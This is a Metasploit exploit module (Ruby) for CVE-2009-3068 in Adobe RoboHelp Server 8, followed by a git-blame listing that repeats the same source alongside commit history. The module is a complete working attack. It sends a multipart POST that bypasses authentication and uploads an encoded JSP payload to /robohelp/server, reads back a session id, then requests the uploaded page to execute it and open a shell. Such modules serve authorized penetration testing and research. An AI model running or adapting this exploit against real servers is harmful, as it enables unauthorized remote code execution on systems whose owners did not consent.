metasploit-framework/modules/exploits/windows/http/adobe_robohelper_authbypass.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Adobe RoboHelp Server 8 Arbitrary File Upload and Execute',
      'Description'    => %q{
          This module exploits an authentication bypass vulnerability which
        allows remote attackers to upload and execute arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'win',
      'Privileged'     => true,
      'References'     =>
        [
          [ 'CVE', '2009-3068' ],
          [ 'OSVDB', '57896'],
          [ 'URL', 'http://www.intevydis.com/blog/?p=69' ],
          [ 'ZDI', '09-066' ],
        ],
      'Targets'        =>
        [
          [ 'Universal Windows Target',
            {
              'Arch'     => ARCH_JAVA,
              'Payload'  =>
                {
                  'DisableNops' => true,
                },
            }
          ],
        ],
      'DefaultOptions' =>
        {
          'SHELL' => 'cmd.exe'
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 23 2009'
    ))

    register_options( [ Opt::RPORT(8080) ])
  end

  def exploit

    page = Rex::Text.rand_text_alpha_upper(8) + ".jsp"
    uid  = rand(20).to_s

    file =  "-----------------------------#{uid}\r\n"
    file << "Content-Disposition: form-data; name=\"filename\"; filename=\"#{page}\"\r\n"
    file << "Content-Type: application/x-java-archive\r\n\r\n"
    file << payload.encoded
    file << "\r\n"

    print_status("Sending our POST request...")

    res = send_request_cgi(
      {
        'uri'		=> '/robohelp/server',
        'version'	=> '1.1',
        'method'	=> 'POST',
        'encode_params' => false,
        'data'		=> file,
        'headers'	=> {
          'Content-Type'		=> 'multipart/form-data; boundary=---------------------------' + uid,
          'UID'			=> uid,
        },
        'vars_get' => {
          'PUBLISH' => uid
        }
      }, 5)

    if ( res and res.message =~ /OK/ )
      id = res['sessionid'].to_s.strip

      print_status("Got sessionid of '#{id}'. Sending our second request to '#{page}'...")
      data = send_request_raw({
          'uri'		=> normalize_uri('robohelp', 'robo','reserved', 'web', id, page),
          'method'	=> 'GET',
          'version'	=> '1.0'
      }, 5)

      handler
    else
      print_error("No SESSIONID acquired...")
      return
    end
  end
end
add MC's module for the Adobe RoboHelp server vuln. git-svn-id: file:///home/svn/framework3/trunk@7072 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-27 18:38:48 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
add MC's module for the Adobe RoboHelp server vuln. git-svn-id: file:///home/svn/framework3/trunk@7072 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-27 18:38:48 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = ExcellentRanking`
add MC's module for the Adobe RoboHelp server vuln. git-svn-id: file:///home/svn/framework3/trunk@7072 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-27 18:38:48 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }`
add more http fingerprints -- thx mc git-svn-id: file:///home/svn/framework3/trunk@9797 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-12 23:25:31 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::HttpClient`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Adobe RoboHelp Server 8 Arbitrary File Upload and Execute',`
			`'Description' => %q{`
			`This module exploits an authentication bypass vulnerability which`
			`allows remote attackers to upload and execute arbitrary code.`
			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'Platform' => 'win',`
			`'Privileged' => true,`
			`'References' =>`
			`[`
			`[ 'CVE', '2009-3068' ],`
Revert "Land #6812, remove broken OSVDB references" This reverts commit 2b016e02165b7abf85c6847fcae2b6131f8a504d, reversing changes made to 7b1d9596c7c95097ef750407ff61f010714434a1. 2016-07-15 17:00:31 +00:00			`[ 'OSVDB', '57896'],`
Retab modules 2013-08-30 21:28:54 +00:00			`[ 'URL', 'http://www.intevydis.com/blog/?p=69' ],`
Update modules to use new ZDI reference 2013-10-21 20:07:07 +00:00			`[ 'ZDI', '09-066' ],`
Retab modules 2013-08-30 21:28:54 +00:00			`],`
			`'Targets' =>`
			`[`
			`[ 'Universal Windows Target',`
			`{`
			`'Arch' => ARCH_JAVA,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
			`},`
			`}`
			`],`
			`],`
Modify modules to keep old behavior 2014-08-31 06:18:53 +00:00			`'DefaultOptions' =>`
			`{`
			`'SHELL' => 'cmd.exe'`
			`},`
Retab modules 2013-08-30 21:28:54 +00:00			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Sep 23 2009'`
			`))`
add MC's module for the Adobe RoboHelp server vuln. git-svn-id: file:///home/svn/framework3/trunk@7072 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-27 18:38:48 +00:00
Fix msf/core and self.class msftidy warnings Also fixed rex requires. 2017-05-03 20:42:21 +00:00			`register_options( [ Opt::RPORT(8080) ])`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
add MC's module for the Adobe RoboHelp server vuln. git-svn-id: file:///home/svn/framework3/trunk@7072 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-27 18:38:48 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
add MC's module for the Adobe RoboHelp server vuln. git-svn-id: file:///home/svn/framework3/trunk@7072 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-27 18:38:48 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`page = Rex::Text.rand_text_alpha_upper(8) + ".jsp"`
			`uid = rand(20).to_s`
add MC's module for the Adobe RoboHelp server vuln. git-svn-id: file:///home/svn/framework3/trunk@7072 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-27 18:38:48 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`file = "-----------------------------#{uid}\r\n"`
			`file << "Content-Disposition: form-data; name=\"filename\"; filename=\"#{page}\"\r\n"`
			`file << "Content-Type: application/x-java-archive\r\n\r\n"`
			`file << payload.encoded`
			`file << "\r\n"`
add MC's module for the Adobe RoboHelp server vuln. git-svn-id: file:///home/svn/framework3/trunk@7072 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-27 18:38:48 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Sending our POST request...")`
add MC's module for the Adobe RoboHelp server vuln. git-svn-id: file:///home/svn/framework3/trunk@7072 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-27 18:38:48 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`res = send_request_cgi(`
			`{`
Resolved all msftidy vars_get warnings 2014-05-25 17:29:39 +00:00			`'uri' => '/robohelp/server',`
Retab modules 2013-08-30 21:28:54 +00:00			`'version' => '1.1',`
			`'method' => 'POST',`
Fix #5103, Revert unwanted URI encoding Fix #5103. By default, Httpclient will encode the URI but we don't necessarily want that. These modules originally didn't use URI encoding when they were written so we should just keep them that way. 2015-04-17 18:59:49 +00:00			`'encode_params' => false,`
Retab modules 2013-08-30 21:28:54 +00:00			`'data' => file,`
Resolved all msftidy vars_get warnings 2014-05-25 17:29:39 +00:00			`'headers' => {`
			`'Content-Type' => 'multipart/form-data; boundary=---------------------------' + uid,`
			`'UID' => uid,`
			`},`
			`'vars_get' => {`
			`'PUBLISH' => uid`
			`}`
Retab modules 2013-08-30 21:28:54 +00:00			`}, 5)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`if ( res and res.message =~ /OK/ )`
			`id = res['sessionid'].to_s.strip`
make sure we got a response before trying to pull headers out of it. see #519 git-svn-id: file:///home/svn/framework3/trunk@7541 4d416f70-5f16-0410-b530-b9f4589650da 2009-11-16 19:00:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Got sessionid of '#{id}'. Sending our second request to '#{page}'...")`
			`data = send_request_raw({`
Resolved all msftidy vars_get warnings 2014-05-25 17:29:39 +00:00			`'uri' => normalize_uri('robohelp', 'robo','reserved', 'web', id, page),`
Retab modules 2013-08-30 21:28:54 +00:00			`'method' => 'GET',`
Resolved all msftidy vars_get warnings 2014-05-25 17:29:39 +00:00			`'version' => '1.0'`
Retab modules 2013-08-30 21:28:54 +00:00			`}, 5)`
add MC's module for the Adobe RoboHelp server vuln. git-svn-id: file:///home/svn/framework3/trunk@7072 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-27 18:38:48 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`handler`
			`else`
			`print_error("No SESSIONID acquired...")`
			`return`
			`end`
			`end`
add MC's module for the Adobe RoboHelp server vuln. git-svn-id: file:///home/svn/framework3/trunk@7072 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-27 18:38:48 +00:00			`end`